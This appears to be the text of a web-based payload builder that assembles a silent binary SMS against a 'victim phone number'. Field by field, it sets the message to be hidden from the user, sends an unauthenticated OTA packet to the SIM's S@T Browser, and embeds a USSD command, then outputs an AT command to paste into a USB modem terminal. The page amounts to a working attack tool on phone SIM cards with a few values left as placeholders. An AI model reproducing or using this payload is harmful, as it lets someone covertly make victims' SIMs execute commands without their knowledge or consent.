SMS-Submit payload builder for USSD demo
Your target number
Victim phone number:
international, no +
USSD code:
Layer 1 — SMS-Submit (outer wrapper)
SCA
00
Use SIM's default SMSC
FO (First Octet)
41
MTI=SMS-Submit, UDHI=1
MR
00
Message reference
DA (Destination Address)
...
Victim's number encoded
PID
7F
SIM Data Download — silent!
DCS
F6
Class 2 — never shown to user
UDL
XX
Total user data length
Layer 2 — User Data Header (triggers SIM routing)
UDHL
02
Header is 2 bytes long
UDH
70 00
IEI=0x70 → security headers follow
Layer 3 — OTA Command Packet (security + routing)
CPL
YYYY
Total command packet length
CHL
0D
Header = 13 bytes
SPI
00 00
NO security — the vulnerability
KIc
00
No encryption key
KID
00
No integrity key
TAR
50 53 48
Target = S@T Browser
CNTR
00 00 00 00 00
Counter (ignored, MSL=0)
PCNTR
00
No padding
Layer 4 — USAT Secured Data (the actual USSD command)
Full AT command for USB modem
Copy this into your modem terminal (minicom / screen)
Building...
Silent routing (PID+DCS)
No security (SPI/KIc/KID)
S@T Browser target (TAR)
USSD payload